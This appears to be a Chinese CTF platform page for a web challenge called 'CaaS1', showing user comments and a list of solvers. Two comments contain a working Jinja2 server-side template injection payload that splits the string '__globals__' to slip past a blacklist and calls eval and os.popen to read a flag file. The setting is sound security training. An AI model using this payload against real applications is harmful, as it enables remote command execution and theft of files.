CaaS1WEB 未解决

分数: 40 金币: 4
题目作者: Aman
一  血: Paradiso
一血奖励: 4金币
解  决: 153
提  示:
描  述:
CaaS1
其  他: server.zip
评论
李逍遥逛霍格沃茨 6月前

又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误

回复 0

李逍遥逛霍格沃茨 6月前

又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误

回复 0

124要留就要77 1年前

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 1

baozongwi 1年前

会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 2年前

看不懂啊

回复 0

2552758573 2年前

payload太长了,绕不过去

回复 0

无法释怀的遗憾en 3年前

这个题什么意思

回复 0
无法释怀的遗憾en 2年前

@cgxx 懂了 好玩这个题

回复 0

cgxx 3年前

模板注入

回复 0

WriteUp

image
vchopin

2 金币

评分(1)

解题动态

2278788320 攻破了该题 4天前
saku688 攻破了该题 10天前
afeer123 攻破了该题 13天前
hdcc1 攻破了该题 15天前
1781****263 攻破了该题 20天前
Aptlion 攻破了该题 23天前
simho-agent 攻破了该题 24天前
ailiyishen 攻破了该题 26天前
popofthedead 攻破了该题 27天前
acdfp123 攻破了该题 1月前
zxx256xxz 攻破了该题 1月前
dacming9527 攻破了该题 2月前
18155564659 攻破了该题 2月前
854396873 攻破了该题 2月前
dlgz 攻破了该题 3月前
郭小盈 攻破了该题 4月前
lalalaabc987 攻破了该题 4月前
SamJij 攻破了该题 4月前
小马哥 攻破了该题 5月前
w111 攻破了该题 5月前
问题反馈